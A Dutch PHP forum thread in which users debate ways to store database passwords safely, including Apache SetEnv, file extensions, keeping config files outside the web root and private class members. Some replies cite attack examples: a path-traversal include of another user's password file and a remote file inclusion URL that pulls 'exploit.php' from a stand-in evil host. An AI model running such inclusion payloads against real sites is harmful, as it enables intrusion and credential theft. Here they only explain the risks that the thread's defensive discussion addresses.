Veilig opslaan database wachtwoorden

Ik ben er wel vanuit gegaan dat je met apache werkt.

Dit kan alleen op een eigen (gehuurde) server zo te zien. Wel jammer.
Ach ja, desnoots kun je hem nog instellen via

voor als je scripts op internet zet (bijv. hier in de scriptlib). Maar dan is het hele nut ervan wel weg.

Aangezien de meeste mensen deze access alleen lokaal hebben, en niet voor hun site, is dit vrij nutteloos.

En dan blijft de vraag, hoe stom ben je las iemand je password uit kan lezen?
Het openen van een php file op afstand gaat niet zonder dat deze geparsed wordt, dus iemand is dan al in bijv. je ftp ...

Of iemand is zo stom om zijn includefile .PHP als extensie te geven, in hoofdletters. Dan wordt het niet geparsed.
(ben het 1 keer bij iemand tegen gekomen, hij zei natuurlijk dat het een oud wachtwoord was, dat niet meer gebruikt werd. Maar daarnaa zag je overal op zijn site dat het wachtwoord niet meer klopte, en de scripts geen verbinding meer konden maken met de db. ^^,)

Of je zit op een gedeelde host, en iemand haalt met ../../../mitchmap/www/dbvars.php jou wachtwoorden file naar binnen :-) (kan alleen op slecht beveiligde servers)

@Bienze: dan heb je de verkeerde host gekozen :D

verder vind ik dit ook een beetje nutteloos. idd alleen als je een eigen server hebt en waarom zou je die SetEnv niet meteen in httpd.conf zetten?

@X-Ray:

Ja, als je host zo slecht is geconfigureerd dan heb je idd een verkeerde host genomen, zonder twijfel!

Waarom zou je SetEnv w?l in je httpd.conf zetten? Op deze manier houd je je wachtwoorden gescheide van de rest van de code.

En je vind het nutteloos? Het doel lijkt me duidelijk; Het veilig opslaan van je database wachtwoorden!

Klein lekje, en je kunt uitvoeren. Ben je weer terug bij af.

Hoezo lek?

Anders kan je toch ook gewoon doen?
Ben je wel heel onnozel als je dat doet :D

Het ging ook om het veilig opslaan, de plaats waar je je wachtwoord nu hebt opgeslagen is veilig... gewoon niet te benaderen vanaf het web.

Je moet alleen wel opletten met het gebruik van print_r($_SERVER); en phpinfo();.
Hierbij geef je niet aan dat je je wachtwoord wilt weergeven, maar word dat wel gedaan!

Het gebruiken van ,INC extenties is superdom vind ik, zodra je deze opent met wordpad heb je het pass gelijk dus niet slim. Save hem gewoon in een .PHP file en je bent veilig, de webserver persed hem dus niemand zal hem ooit kunnen zien;)
Have fun

XanaX

Hangt er van af, mijn host parsed ook .inc

zet gewoon de files met passwords etc buiten je public_html dir. Dat werkt het beste ;)

"En je vind het nutteloos? Het doel lijkt me duidelijk; Het veilig opslaan van je database wachtwoorden!"

als je het gewoon in een .php bestand (of .inc of iets anders, zolang het maar geparsed wordt) is het al veilig opgeslagen.

Je moet dan alleen veilig _omgaan_ met die variabelen en het bestand waarin ze staan.

Men heeft dus meer aan een tut over allerlei beveiligingslekken en hoe deze op te lossen/tegen te gaan dan aan dit soort onnozele dingen.

Wanneer heb je die tut klaar? Ik kan niet wachten om em te lezen!

duurt nog wel ff, heb momenteel geen tijd.

edit: maar op andere sites (phpfreakz.nl bijv.) is al zoiets te vinden.

Edit2: maar je kunt ook gewoon toegeven dat je hier stoer loopt te doen met een tutorial die nergens over gaat.

Dit is alleen nuttig als je 1 database op 1 hele server gebruikt, verder niet. Ik zou inderdaad het wachtwoord uberhaubt nooit in een .inc-bestand opslaan, maar in een bestand die eindigt op .php. Vervolgens zet ik dat bestand sowieso in een niet-webaccessible directory. Dit laatste is bijna altijd wel mogelijk, zelfs bij servers waar je maar een beperkte toegang hebt (zoals bij virtual hosting)

Geval 1:
Benodigd voor toegang wachtwoord: Leesrechten over dbvars.php

Geval 2:
Benodigd voor toegang wachtwoord: Wachtwoord toegankelijk voor elk script

Is dit een security-through-obscurity-geval? (veiligheid door obscure methoden?)

Mijn punt:
Dit gaat helemaal nergens over. Dit is het van de regen in de drup helpen van mensen

Ik zie namelijk totaal niet in waarom dit veiliger is dan het eerste geval. In plaats van dat het op ??n controleerbare plaats staat, geef je je wachtwoord gratis weg aan ELK script wat door de webserver wordt uitgevoerd, of toegang tot de Enviroment variabelen van de server heeft.

Ik kies uit veiligheidsoogpunt zeker voor de eerste optie. Ik wil dit aan iedereen van harte afraden.

In geval van de slecht beveligde server kan men altijd nog (fread of include zonder controle waar het heengaat):
file.php?pagian=http://slechteevilgast.nl/exploit.php



Het punt is namelijk helemaal niet WAAR je je db wachtwoorden opslaat. Maar dat je gaten hebt waardoor de configuratiefiles te lezen zijn. En op het moment dat een evil gast de mogelijkheid heeft tot het uitvoeren van script is het einde zowiezo zoek.

Ik ben het met Arend eens. Liever je wachtwoorden op een gecontroleerde plaats dan onbeperkt en overal aan te roepen.

Nog een klein tipje: Je kan zelfs door de functie "defined" toegang van php-bestanden tot het wachtwoord-file beperken.

Denk aan:

@norvo: als je gewoon je wachtwoord als (php)variabele in dat script hebt staan voegt dat ook niks toe.

Natuurlijk slaat niemand z'n database wachtwoorden in een .inc bestand op, maar degene die dit login script gebruiken zitten al met het probleem!

http://www.phphulp.nl/php/tutorials/2/167/309/

De wat meer gevorderde zal het misschien aanpassen, maar een beginner neemt het kwakkeloos over...

De gevorderde lapini bouwd er ook lekker op door!

http://www.phphulp.nl/php/scripts/3/367/

Ik zal nog even naar wat meer scripts zoeken hier die db passwords opslaan in een .inc bestand...

hallo hier met jan groen,

ik wilde graag mijn homepage beveiligen tegen printen maar hoe doe ik dat?

alvast bedankt

Dat kan niet :D

nou, het schijnt moegelijk te zijn css style te maken voor on screen / print only kun je print helemaal wit maken :P

http://www.w3schools.com/css/css_mediatypes.asp
En dan zou je in het print-stylesheet kunnen zetten dat alles wordt verborgen.
Maar zoals altijd, voor de wt meer gevorderde gebruiker, als hij het wil printen, dan zal hem dat zeker ook (misschien met wat meer moeite) lukken.

Hoi,

Tuts over beveiligingen vind ik altijd leuk, vb;
** dbvars.inc **


--> Het nadeel hiervan is, helemaal als je meer beveiliginslekken in je website hebt, dat de onbevoegden deze pagina kunnen benaderen en op slimme wijze je wachtwoord kunnen achterhalen.

Maar wat ik telkens mis is 'HOE' een ander deze variabelen kan oproepen. Niet dat ik op zoek ben naar methodes om dit te doen.

Maar als we als beginner weten hoe dit gedaan wordt, dan kunnen we er in het vervolg mee rekening houden. Of heb ik het mis?

grtz

tumbler -> INDERDAAD! Hoe doen ze dat dan. Ik ben altijd uren bezig om alles dicht te bouwen, maar heb geen idee hoe ze eigenlijk naar binnen komen.

Marinka schreef op 21.09.2005 00:07
tumbler -> INDERDAAD! Hoe doen ze dat dan. Ik ben altijd uren bezig om alles dicht te bouwen, maar heb geen idee hoe ze eigenlijk naar binnen komen.

Kijk hier eens rond en speel beide levels uit misschien krijg je dan een idee
http://quiz.ngsec.com/

Hallo,

Ik ben nog vrij nieuw met het beveiligen van dit soort zaken en vroeg me het volgende af. Ik heb mijn wachtwoorden opgeslagen in een bestand "config.php" dat op bijna elke pagina geinclude word. Is dit dan niet veilig ?? en zo nee welke stappen kan ik dan het beste ondernemen om deze gegevens het beste te beveiligen ??

gr

als je toch al beveiligingslekken hebt, is aan root rechten komen ook niet zon probleem, aangezien php daar zelf ook op moet draaien;)

Hoeft niet, kan ook zonder root rechten draaien of in een chroot...

Sla "secrets" als protected of private var op in je main class. Je DB class of je master class. Dan kan ie nooit geprint worden, alleen als je dat zelf in je class hebt gescript (en dan ben je wel echt heel erg stom!) maar wel gebruikt worden om DBConn te maken.
Makkelijk, snel, veilig.

probeer eens reflection of var_dump, volgens mij geven ze allebei het antwoord wel ;)

sorry!!! maar hebben jullie de scripts en tutotials hier op de site al eens goed bekeken? ik wel, en dan nog niet eens allemaal, maar die ik gezien heb is toch zeker 25 a 30% niet in orde, want daar zag ik heel vaak soortgelijke connects het script staan inplaats van include ("config of connect");

$server = "localhost"; // je host
$gebruiker = ".."; // gebruikersnaam
$wachtwoord = ".."; // je wachtwoord
$database = ".."; // je database

mysql_connect($server, $gebruiker, $wachtwoord) or die (mysql_error());
mysql_select_db($database) or die (mysql_error());